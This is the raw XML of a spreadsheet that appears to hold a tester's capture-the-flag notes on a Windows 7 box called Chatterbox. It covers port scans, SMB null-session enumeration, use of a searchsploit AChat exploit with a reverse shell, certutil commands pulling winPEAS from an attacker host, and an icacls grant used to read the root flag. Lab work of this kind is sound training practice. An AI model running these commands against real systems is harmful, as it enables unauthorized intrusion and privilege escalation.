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6BA3DE2F-25DD-4B72-9183-DD572DA032AB}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
  <bookViews>
    <workbookView xWindow="-135" yWindow="-16335" windowWidth="29070" windowHeight="15750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1" i="1" l="1"/>
  <c r="E7" i="1"/>
  <c r="E3" i="1"/>
  <c r="E10" i="1"/>
  <c r="E5" i="1"/>
  <c r="E8" i="1"/>
  <c r="E4" i="1"/>
  <c r="E6" i="1"/>
  <c r="E12" i="1"/>
  <c r="E2" i="1"/>
  <c r="E9" i="1"/>
  <c r="F11" i="1"/>
  <c r="F7" i="1"/>
  <c r="F3" i="1"/>
  <c r="F10" i="1"/>
  <c r="F5" i="1"/>
  <c r="F8" i="1"/>
  <c r="F4" i="1"/>
  <c r="F6" i="1"/>
  <c r="F12" i="1"/>
  <c r="F2" i="1"/>
  <c r="F9" i="1"/>
</calcChain>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="98" uniqueCount="67">
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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 xml:space="preserve">9256/tcp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</si>
  <si>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139/tcp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</si>
  <si>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49157/tcp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</si>
  <si>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49152/tcp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</si>
  <si>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135/tcp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</si>
  <si>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49155/tcp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</si>
  <si>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9255/tcp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</si>
  <si>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49154/tcp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</si>
  <si>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49156/tcp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</si>
  <si>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445/tcp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</si>
  <si>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49153/tcp</t>
  </si>
  <si>
    <t>135/tcp   open  msrpc        Microsoft Windows RPC</t>
  </si>
  <si>
    <t>139/tcp   open  netbios-ssn  Microsoft Windows netbios-ss</t>
  </si>
  <si>
    <t>445/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
Host script results:
| smb-security-mode: 
|   account_used: &lt;blank&gt;
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2:1:0: 
|_    Message signing enabled but not required
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: Chatterbox
|   NetBIOS computer name: CHATTERBOX\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2026-06-30T14:59:26-04:00
| smb2-time: 
|   date: 2026-06-30T18:59:27
|_  start_date: 2026-06-30T18:50:02
|_clock-skew: mean: 6h20m01s, deviation: 2h18m34s, median: 5h00m01s</t>
  </si>
  <si>
    <t>Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)</t>
  </si>
  <si>
    <t>9255/tcp  open  tcpwrapped</t>
  </si>
  <si>
    <t>9256/tcp  open  tcpwrapped</t>
  </si>
  <si>
    <t>49152/tcp open  msrpc        Microsoft Windows RPC</t>
  </si>
  <si>
    <t>49153/tcp open  msrpc        Microsoft Windows RPC</t>
  </si>
  <si>
    <t>49154/tcp open  msrpc        Microsoft Windows RPC</t>
  </si>
  <si>
    <t>49155/tcp open  msrpc        Microsoft Windows RPC</t>
  </si>
  <si>
    <t>49156/tcp open  msrpc        Microsoft Windows RPC</t>
  </si>
  <si>
    <t>49157/tcp open  msrpc        Microsoft Windows RPC</t>
  </si>
  <si>
    <t>cat hosts /etc/hosts | sudo tee /etc/hosts | head -1</t>
  </si>
  <si>
    <t>Currently no anon auth.</t>
  </si>
  <si>
    <t>https://nvd.nist.gov/vuln/detail/CVE-2025-34127</t>
  </si>
  <si>
    <t>searchsploit -m windows/remote/36025.py</t>
  </si>
  <si>
    <t>alfred</t>
  </si>
  <si>
    <t>Group Name                             Type             SID          Attributes                                        
====================================== ================ ============ ==================================================
Everyone                               Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                          Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE               Well-known group S-1-5-4      Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                          Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users       Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization         Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account             Well-known group S-1-5-113    Mandatory group, Enabled by default, Enabled group
LOCAL                                  Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication       Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label            S-1-16-8192  Mandatory group, Enabled by default, Enabled group</t>
  </si>
  <si>
    <t>C:\Users\Administrator\Downloads\SDelete&gt;whoami /all
whoami /all
USER INFORMATION
----------------
User Name         SID                                          
================= =============================================
chatterbox\alfred S-1-5-21-1218242403-4263168573-589647361-1000
GROUP INFORMATION
-----------------
Group Name                             Type             SID          Attributes                                        
====================================== ================ ============ ==================================================
Everyone                               Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                          Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE               Well-known group S-1-5-4      Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                          Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users       Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization         Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account             Well-known group S-1-5-113    Mandatory group, Enabled by default, Enabled group
LOCAL                                  Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication       Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label            S-1-16-8192  Mandatory group, Enabled by default, Enabled group
PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                          State   
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled 
SeUndockPrivilege             Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
SeTimeZonePrivilege           Change the time zone                 Disabled</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">That was easy. Exploit worked. Achat
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Aptos Narrow"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>Had to tweak and set shell to windows/shell_reverse_tcp. It keeps dying with meterpreter.</t>
    </r>
  </si>
  <si>
    <t>icacls root.txt /grant alfred:F</t>
  </si>
  <si>
    <t>root.txt: 8072c806ef448e23ae7c5f4985566c28</t>
  </si>
  <si>
    <t>Oh I have permissions on Admins directory. Need to update the permission on the file.</t>
  </si>
  <si>
    <t>certutil -urlcache -split -f http://[attack IP]:8080/windows-privesc-check2.exe windows-privesc-check2.exe</t>
  </si>
  <si>
    <t>certutil -urlcache -split -f http://[attack IP]:8080/winPEASx64.exe winPEASx64.exe</t>
  </si>
  <si>
    <t>certutil -urlcache -split -f http://[attack IP]:8080/winPEASx86.exe winPEASx86.exe</t>
  </si>
  <si>
    <t>[victim IP]</t>
  </si>
  <si>
    <t xml:space="preserve">[victim IP] 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</si>
  <si>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</si>
  <si>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</si>
  <si>
    <t>netexec smb [victim IP] --generate-hosts-file hosts</t>
  </si>
  <si>
    <t>netexec smb [victim IP]  -u '' -p '' --shares</t>
  </si>
  <si>
    <t>netexec smb [victim IP] -u 'null' -p '' --shares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</si>
</sst>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2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1" applyAlignment="1">
      <alignment vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="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vd.nist.gov/vuln/detail/CVE-2025-3412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8"/>
  <sheetViews>
    <sheetView tabSelected="1" zoomScale="81" zoomScaleNormal="81" workbookViewId="0">
      <pane ySplit="1" topLeftCell="A5" activePane="bottomLeft" state="frozen"/>
      <selection activeCell="E1" sqref="E1"/>
      <selection pane="bottomLeft" activeCell="A9" sqref="A9"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="15.77734375" defaultRowHeight="15" customHeight="1" x14ac:dyDescent="0.3"/>
  <cols>
    <col min="1" max="16384" width="15.77734375" style="9"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:11" s="8" customFormat="1" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1" s="8" t="s">
        <v>0</v>
      </c>
      <c r="B1" s="8" t="s">
        <v>15</v>
      </c>
      <c r="C1" s="8" t="s">
        <v>1</v>
      </c>
      <c r="D1" s="8" t="s">
        <v>18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21</v>
      </c>
      <c r="J1" s="8" t="s">
        <v>10</v>
      </c>
      <c r="K1" s="8" t="s">
        <v>9</v>
      </c>
    </row>
    <row r="2" spans="1:11" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2" s="7" t="s">
        <v>60</v>
      </c>
      <c r="B2" s="9" t="s">
        <v>37</v>
      </c>
      <c r="D2" s="9" t="s">
        <v>33</v>
      </c>
      <c r="E2" s="10" t="str">
        <f t="shared" ref="E2:E12" si="0">LEFT($D2,FIND("/",$D2)-1)</f>
        <v>49153</v>
      </c>
      <c r="F2" s="11" t="str">
        <f t="shared" ref="F2:F12" si="1">MID($D2,FIND("/",$D2)+1,LEN($D2))</f>
        <v>tcp</v>
      </c>
      <c r="G2" s="9" t="s">
        <v>41</v>
      </c>
    </row>
    <row r="3" spans="1:11" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3" s="7" t="s">
        <v>60</v>
      </c>
      <c r="B3" s="9" t="s">
        <v>37</v>
      </c>
      <c r="D3" s="9" t="s">
        <v>26</v>
      </c>
      <c r="E3" s="10" t="str">
        <f t="shared" si="0"/>
        <v>49152</v>
      </c>
      <c r="F3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3" s="9" t="s">
        <v>40</v>
      </c>
    </row>
    <row r="4" spans="1:11" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4" s="7" t="s">
        <v>60</v>
      </c>
      <c r="B4" s="9" t="s">
        <v>37</v>
      </c>
      <c r="D4" s="9" t="s">
        <v>30</v>
      </c>
      <c r="E4" s="10" t="str">
        <f t="shared" si="0"/>
        <v>49154</v>
      </c>
      <c r="F4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4" s="9" t="s">
        <v>42</v>
      </c>
    </row>
    <row r="5" spans="1:11" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A5" s="7" t="s">
        <v>60</v>
      </c>
      <c r="B5" s="9" t="s">
        <v>37</v>
      </c>
      <c r="D5" s="9" t="s">
        <v>28</v>
      </c>
      <c r="E5" s="10" t="str">
        <f t="shared" si="0"/>
        <v>49155</v>
      </c>
      <c r="F5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5" s="9" t="s">
        <v>43</v>
      </c>
      <c r="H5" s="8"/>
      <c r="J5" s="12"/>
    </row>
    <row r="6" spans="1:11" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A6" s="7" t="s">
        <v>60</v>
      </c>
      <c r="B6" s="9" t="s">
        <v>37</v>
      </c>
      <c r="D6" s="9" t="s">
        <v>31</v>
      </c>
      <c r="E6" s="10" t="str">
        <f t="shared" si="0"/>
        <v>49156</v>
      </c>
      <c r="F6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6" s="9" t="s">
        <v>44</v>
      </c>
    </row>
    <row r="7" spans="1:11" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A7" s="7" t="s">
        <v>60</v>
      </c>
      <c r="B7" s="9" t="s">
        <v>37</v>
      </c>
      <c r="D7" s="9" t="s">
        <v>25</v>
      </c>
      <c r="E7" s="10" t="str">
        <f t="shared" si="0"/>
        <v>49157</v>
      </c>
      <c r="F7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7" s="9" t="s">
        <v>45</v>
      </c>
    </row>
    <row r="8" spans="1:11" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A8" s="7" t="s">
        <v>60</v>
      </c>
      <c r="B8" s="9" t="s">
        <v>37</v>
      </c>
      <c r="D8" s="9" t="s">
        <v>29</v>
      </c>
      <c r="E8" s="10" t="str">
        <f t="shared" si="0"/>
        <v>9255</v>
      </c>
      <c r="F8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8" s="9" t="s">
        <v>38</v>
      </c>
    </row>
    <row r="9" spans="1:11" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A9" s="7" t="s">
        <v>61</v>
      </c>
      <c r="B9" s="9" t="s">
        <v>37</v>
      </c>
      <c r="D9" s="9" t="s">
        <v>23</v>
      </c>
      <c r="E9" s="10" t="str">
        <f t="shared" si="0"/>
        <v>9256</v>
      </c>
      <c r="F9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9" s="9" t="s">
        <v>39</v>
      </c>
      <c r="H9" s="9" t="s">
        <v>53</v>
      </c>
      <c r="J9" s="12" t="s">
        <v>48</v>
      </c>
    </row>
    <row r="10" spans="1:11" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A10" s="7" t="s">
        <v>60</v>
      </c>
      <c r="B10" s="9" t="s">
        <v>37</v>
      </c>
      <c r="D10" s="9" t="s">
        <v>27</v>
      </c>
      <c r="E10" s="10" t="str">
        <f t="shared" si="0"/>
        <v>135</v>
      </c>
      <c r="F10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10" s="9" t="s">
        <v>34</v>
      </c>
    </row>
    <row r="11" spans="1:11" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A11" s="7" t="s">
        <v>61</v>
      </c>
      <c r="B11" s="9" t="s">
        <v>37</v>
      </c>
      <c r="D11" s="9" t="s">
        <v>24</v>
      </c>
      <c r="E11" s="10" t="str">
        <f t="shared" si="0"/>
        <v>139</v>
      </c>
      <c r="F11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11" s="9" t="s">
        <v>35</v>
      </c>
      <c r="H11" s="8"/>
      <c r="I11" s="8"/>
      <c r="J11" s="12"/>
    </row>
    <row r="12" spans="1:11" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A12" s="7" t="s">
        <v>60</v>
      </c>
      <c r="B12" s="9" t="s">
        <v>37</v>
      </c>
      <c r="D12" s="9" t="s">
        <v>32</v>
      </c>
      <c r="E12" s="10" t="str">
        <f t="shared" si="0"/>
        <v>445</v>
      </c>
      <c r="F12" s="11" t="str">
        <f t="shared" si="1"/>
        <v xml:space="preserve">tcp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G12" s="9" t="s">
        <v>36</v>
      </c>
      <c r="H12" s="9" t="s">
        <v>47</v>
      </c>
      <c r="I12" s="8"/>
      <c r="J12" s="12"/>
    </row>
    <row r="13" spans="1:11" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A13" s="7"/>
      <c r="E13" s="10"/>
      <c r="F13" s="11"/>
      <c r="G13" s="8"/>
      <c r="I13" s="8"/>
      <c r="J13" s="12"/>
    </row>
    <row r="14" spans="1:11" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A14" s="7"/>
      <c r="E14" s="10"/>
      <c r="F14" s="11"/>
    </row>
    <row r="15" spans="1:11" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A15" s="7"/>
      <c r="E15" s="10"/>
      <c r="F15" s="11"/>
      <c r="J15" s="12"/>
    </row>
    <row r="16" spans="1:11" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="E16" s="10"/>
      <c r="F16" s="11"/>
    </row>
    <row r="17" spans="1:10" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="E17" s="10"/>
      <c r="F17" s="11"/>
    </row>
    <row r="18" spans="1:10" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="E18" s="10"/>
      <c r="F18" s="11"/>
    </row>
    <row r="19" spans="1:10" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A19" s="7"/>
      <c r="E19" s="10"/>
      <c r="F19" s="11"/>
    </row>
    <row r="20" spans="1:10" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A20" s="7"/>
      <c r="E20" s="10"/>
      <c r="F20" s="11"/>
    </row>
    <row r="21" spans="1:10" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A21" s="7"/>
      <c r="E21" s="10"/>
      <c r="F21" s="11"/>
    </row>
    <row r="22" spans="1:10" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="E22" s="10"/>
      <c r="F22" s="11"/>
    </row>
    <row r="23" spans="1:10" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A23" s="7"/>
      <c r="E23" s="10"/>
      <c r="F23" s="11"/>
      <c r="I23" s="8"/>
      <c r="J23" s="12"/>
    </row>
    <row r="24" spans="1:10" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="E24" s="10"/>
      <c r="F24" s="11"/>
    </row>
    <row r="25" spans="1:10" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="E25" s="10"/>
      <c r="F25" s="11"/>
    </row>
    <row r="26" spans="1:10" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="E26" s="10"/>
      <c r="F26" s="11"/>
      <c r="I26" s="8"/>
      <c r="J26" s="12"/>
    </row>
    <row r="27" spans="1:10" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A27" s="7"/>
      <c r="E27" s="10"/>
      <c r="F27" s="11"/>
    </row>
    <row r="28" spans="1:10" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="E28" s="10"/>
      <c r="F28" s="11"/>
    </row>
  </sheetData>
  <sortState xmlns:xlrd2="http://schemas.microsoft.com/office/spreadsheetml/2017/richdata2" ref="A2:K30">
    <sortCondition ref="F2:F30"/>
    <sortCondition ref="E2:E30"/>
  </sortState>
  <phoneticPr fontId="3" type="noConversion"/>
  <hyperlinks>
    <hyperlink ref="J9" r:id="rId1" xr:uid="{478C223F-FC55-4A4A-AD07-F60D4014322B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H24"/>
  <sheetViews>
    <sheetView zoomScale="78" zoomScaleNormal="78" workbookViewId="0">
      <pane ySplit="1" topLeftCell="A2" activePane="bottomLeft" state="frozen"/>
      <selection activeCell="C1" sqref="C1"/>
      <selection pane="bottomLeft" activeCell="F28" sqref="F28"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="15.77734375" defaultRowHeight="15" customHeight="1" x14ac:dyDescent="0.3"/>
  <cols>
    <col min="1" max="16384" width="15.77734375" style="2"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:8" s="4" customFormat="1" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1" s="4" t="s">
        <v>7</v>
      </c>
      <c r="B1" s="4" t="s">
        <v>17</v>
      </c>
      <c r="C1" s="4" t="s">
        <v>16</v>
      </c>
      <c r="D1" s="4" t="s">
        <v>8</v>
      </c>
      <c r="E1" s="4" t="s">
        <v>5</v>
      </c>
      <c r="F1" s="4" t="s">
        <v>21</v>
      </c>
      <c r="G1" s="4" t="s">
        <v>10</v>
      </c>
      <c r="H1" s="4" t="s">
        <v>9</v>
      </c>
    </row>
    <row r="2" spans="1:8" s="4" customFormat="1" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2" s="1"/>
      <c r="B2" s="2"/>
      <c r="C2" s="2"/>
      <c r="D2" s="2"/>
      <c r="E2" s="2"/>
      <c r="F2" s="2"/>
    </row>
    <row r="3" spans="1:8" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3" s="1"/>
      <c r="G3" s="5"/>
    </row>
    <row r="4" spans="1:8" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4" s="1"/>
    </row>
    <row r="5" spans="1:8" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A5" s="1"/>
      <c r="E5" s="1"/>
    </row>
    <row r="6" spans="1:8" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="E6" s="1"/>
      <c r="F6" s="4"/>
    </row>
    <row r="8" spans="1:8" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="D8" s="4"/>
    </row>
    <row r="9" spans="1:8" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="D9" s="4"/>
    </row>
    <row r="10" spans="1:8" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="D10" s="4"/>
      <c r="F10" s="5"/>
    </row>
    <row r="11" spans="1:8" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="D11" s="4"/>
    </row>
    <row r="12" spans="1:8" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="D12" s="4"/>
    </row>
    <row r="13" spans="1:8" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="D13" s="4"/>
    </row>
    <row r="14" spans="1:8" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="D14" s="4"/>
    </row>
    <row r="15" spans="1:8" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="D15" s="4"/>
    </row>
    <row r="24" spans="7:7" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="G24" s="5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4"/>
  <sheetViews>
    <sheetView zoomScale="73" zoomScaleNormal="73" workbookViewId="0">
      <pane ySplit="1" topLeftCell="A2" activePane="bottomLeft" state="frozen"/>
      <selection activeCell="B1" sqref="B1"/>
      <selection pane="bottomLeft" activeCell="H15" sqref="H15"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="15.77734375" defaultRowHeight="15" customHeight="1" x14ac:dyDescent="0.3"/>
  <cols>
    <col min="1" max="16384" width="15.777343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60</v>
      </c>
      <c r="E2" s="2" t="s">
        <v>50</v>
      </c>
      <c r="F2" s="2" t="s">
        <v>52</v>
      </c>
      <c r="G2" s="2" t="s">
        <v>51</v>
      </c>
      <c r="H2" s="2" t="s">
        <v>56</v>
      </c>
      <c r="I2" s="5"/>
      <c r="J2" s="4" t="s">
        <v>55</v>
      </c>
    </row>
    <row r="3" spans="1:11" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3" s="1"/>
      <c r="E3" s="1"/>
      <c r="I3" s="5"/>
    </row>
    <row r="4" spans="1:11" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4" s="1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14"/>
  <sheetViews>
    <sheetView zoomScale="80" zoomScaleNormal="80" workbookViewId="0">
      <selection sqref="A1:XFD1048576"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" customHeight="1" x14ac:dyDescent="0.3"/>
  <cols>
    <col min="1" max="1" width="122.21875" style="6" customWidth="1"/>
    <col min="2" max="16384" width="8.88671875" style="2"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:1" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1" s="4" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="2" spans="1:1" s="13" customFormat="1" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2" s="13" t="s">
        <v>62</v>
      </c>
    </row>
    <row r="3" spans="1:1" s="13" customFormat="1" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3" s="13" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="4" spans="1:1" s="13" customFormat="1" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4" s="6" t="s">
        <v>20</v>
      </c>
    </row>
    <row r="5" spans="1:1" s="13" customFormat="1" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A5" s="6" t="s">
        <v>19</v>
      </c>
    </row>
    <row r="6" spans="1:1" s="13" customFormat="1" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A6" s="6" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="7" spans="1:1" s="13" customFormat="1" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A7" s="6" t="s">
        <v>46</v>
      </c>
    </row>
    <row r="8" spans="1:1" s="13" customFormat="1" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A8" s="6" t="s">
        <v>65</v>
      </c>
    </row>
    <row r="9" spans="1:1" s="13" customFormat="1" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A9" s="6" t="s">
        <v>66</v>
      </c>
    </row>
    <row r="10" spans="1:1" s="13" customFormat="1" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A10" s="6" t="s">
        <v>49</v>
      </c>
    </row>
    <row r="11" spans="1:1" s="13" customFormat="1" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A11" s="6" t="s">
        <v>57</v>
      </c>
    </row>
    <row r="12" spans="1:1" s="13" customFormat="1" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A12" s="6" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="13" spans="1:1" s="13" customFormat="1" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A13" s="6" t="s">
        <v>59</v>
      </c>
    </row>
    <row r="14" spans="1:1" s="13" customFormat="1" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A14" s="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"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="A20" sqref="A20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Web App</vt:lpstr>
      <vt:lpstr>On host</vt:lpstr>
      <vt:lpstr>Commands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2026-06-30T16:08:26Z</dcterms:modified>
</cp:coreProperties>
</file>